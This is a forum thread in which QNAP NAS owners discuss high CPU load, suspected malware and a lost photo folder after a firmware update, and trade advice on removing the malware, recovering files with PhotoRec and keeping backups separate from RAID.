Folder contents missing

[SvenW]

Hello,

----< Long and rambling desription on how I got to the current problem >----

I'm not sure this goes in the right sub-forum, but couldn't find any better matches, so here goes. Yesterday, a longish string of events started unrolling. I logged into my TS-251 NAS, for the first time in a while, and was prompted to update my firmware, which I did. Updating the firmware removed Twonky, so I experimented a while with QNAP's own DLNA service, to no avail. Part of this process was a lengthy indexing process, that I assumed loaded the NAS CPU heavily. Load, howaever, stayed at 100% after the indexing. The DLNA contraption stopped co-operating when I made changes to pre-set shared folders; it wouldn't share any folders that were not marked as media folders, so I tried setting this parameter in the Filestation for the folders I tried to change; the parameter wouldn't stick to the folders. Shortly after I found that Twonky could after all be installed manually, and managed to do this, now that side of things is working fine. To get this running I had to remove an older version of Twonky apparently re-introduced to the latest firmware updates.

Since the CPU load stayed at 100% I started surfing around that subject and found these threads:
https://www.reddit.com/r/qnap/comments/ ... t_100_cpu/
viewtopic.php?t=133006

Apparently I had malware on the NAS, so I followed the instructions given on both threads, and as far as I know managed to oust the malware. The removal app reported succesful removals, and I manually deleted something running in the container station. The container station itself was not something I had knowingly used before and seemed meant for applications I wasn't palnning to use, so I removed the entire station while I was at it. After reading about potential vulnerabilities in media sharing apps I removed also the photo-, video- and music stations, which I have never used. Now the CPU load is low on idle, and NAS seems to reject unauthorized connection attempts.

---< TLDR; Current crisis >---

At some point I seem to have lost all the contents of one folder on my drives. Ofcourse this content is my photoarchive, the only truly critical content I have placed on the NAS, and the sole reason for me running the system in RAID 1 configuration. I googled what to do and followed the advice to remove one of the drives (physically pulled it out), in the hopes of not writing anything (at least anything more) over possibly recoverable data. It's possible I've already done some damage, since I'm not certain at which point and how the data was lost to me.

Any ideas how I should proceed? I'm at the limits (probably over) of my own expertise just using the browser interface to the NAS, and am in dire need of instructions given in layman's terms. I did find and read this thread:

viewtopic.php?t=67384

I have practically zero experience with Linux and other variants around the theme, so I suppose it's even possible that the data is still there and I've just lost my visibility to it, somehow but I doubt it. I connected with putty, found the folder the data was supposed to be, and found nothing.

[peon2t]

Hello

Unfortunately I can't help you but I can add that I have a problem that may be similar to yours:

After upgrading the firmware I also see CPU load at permanent 100% and I also see my data vanishing...

I opened a thread about it viewtopic.php?f=160&t=135614.

I really hope there is a soulution to this because otherwise I'm in big trouble.

[Trexx]

In terms of recovering your data, you MIGHT be able to get your data back via recovery apps/etc. by plugging the drive into a USB dock. For significant $$$$$ you could also ship it to a recovery service to see if they can get the data back.

I would hope you had other backups/archives beyond the QNAP itself as RAID is NOT a substitute or replacement for backups. RAID helps to protect against data loss from a HDD failure, but NOT other potential causes of data loss.


In terms of malware, make sure you are updated to the latest 4.3.3.299 build of the firmware as it has many security fixes and also have the Malware Remover QPKG installed. It also re-enabled Twonky support for some NAS models (listed in release notes).

You may also want to see this page on ransomware: https://www.qnap.com/solution/ransomware/en/

[peon2t]

@ SvenW

Actually if you were running a RAID1 and no encryption you might be in a much better situation than I am:

You said you already pulled the drives out of the NAS.

Now hook them (actually: one of them) up to a computer, either directly via SATA cable or by using a SATA->USB Adapter (can be bought for about 30$ - but you need one that also can power 3,5" and not only 2,5" disks!)

Then you can try to recover your data using the free Photorec tool (from cgsecurity.org). Make sure to set the file options so that only your photo files are recovered because otherwise it probably will also recover all the data that you don't need it to recover.

Unfortunately I don't know if you need to do this form a Linux machine (or at least install some ext-filesystem-drivers on your Windows machine) before or if Photorec also can do recovery from ext-filesystems when running on a Windows machine. I'm only using Linux anyway.


@ Trexx

You seem to be very confident about the reason for the data loss being malware. Do you have any explanation why this alleged malware suddenly starts to kill data after the latest firmware update and not before?
I think there is some likelihood that the "malware" we're talking about here is really the latest firmware...
(As I explained in my thread there is actually no chance how my NAS could have beein infected with malware other than QNAP either distributed it themselfes via their update servers or having built in massive security flaws that enable an attacker to get into the NAS form the outside without the user having to do anything...)

[Trexx]

@ Trexx

You seem to be very confident about the reason for the data loss being malware. Do you have any explanation why this alleged malware suddenly starts to kill data after the latest firmware update and not before?
I think there is some likelihood that the "malware" we're talking about here is really the latest firmware...
(As I explained in my thread there is actually no chance how my NAS could have beein infected with malware other than QNAP either distributed it themselfes via their update servers or having built in massive security flaws that enable an attacker to get into the NAS form the outside without the user having to do anything...)

There were multiple patches for security vulnerabilities over the summer. https://www.qnap.com/en/support/con_show.php?cid=41
Even something as basic as enabling myQnapCloud in some cases was all that was needed for attackers to get a foothold in.

If they got in, they could easily plant a cron/autorun job to kick-off on reboot that deletes data. Many people don't reboot their NAS other than during firmware upgrades, so the issue (symptom) shows up during the firmware update, but the firmware itself wouldn't be the cause.

As for other ways for data loss to occur, there are multiple ways that can happen, I outlined a couple of in your thread.

[SvenW]

Hi All,

Thought to give an update on my progress, for posterity. I managed to salvage my photos from the drive left connected to the NAS, using PhotoRec executed from a brand new external drive, and have sifted through the gazillion files. Luckily I had an old backup on an external drive, so I could focus on more recent photos. Now I'm moving the combined collection of recovered files and old backups back to the NAS, and received a beep alert about disk utilisation reaching 80% limit. I don't remember this happening before. Looking into it, I just now found a disk utilization graph going back for a year, and it appears that the amount of data has not had a drop at any point... I would expect to see a drop equivalent to lost data, but there's nothing.

I'm planning on taking an external back-up of the entire data volume next, and then re-entering and sychronizing the ejected volume to regain RAID 1. I suppose I'll have to do something about the 'hidden' data that still takes space, but I'll wait at least after the backup. I've also continued on my endeavour to disable any services I'm not aware of using (that would be practically everything), but there's still a bunch of processess running that seem to be related to these. Malware remover also has reported once per day of finding and removing malware, although foreign connections seem to have stopped. Removal program is not informing what it has found and removed, which is getting frustrating. I wonder where the malware is coming from.

Any ideas how to get rid of the ghost data?

[Trexx]

Do you have network recycle bins enabled? It is very possible the data is there. Could also be qsync verionsing, thin provisioning, etc. that are impacting used vs. free space.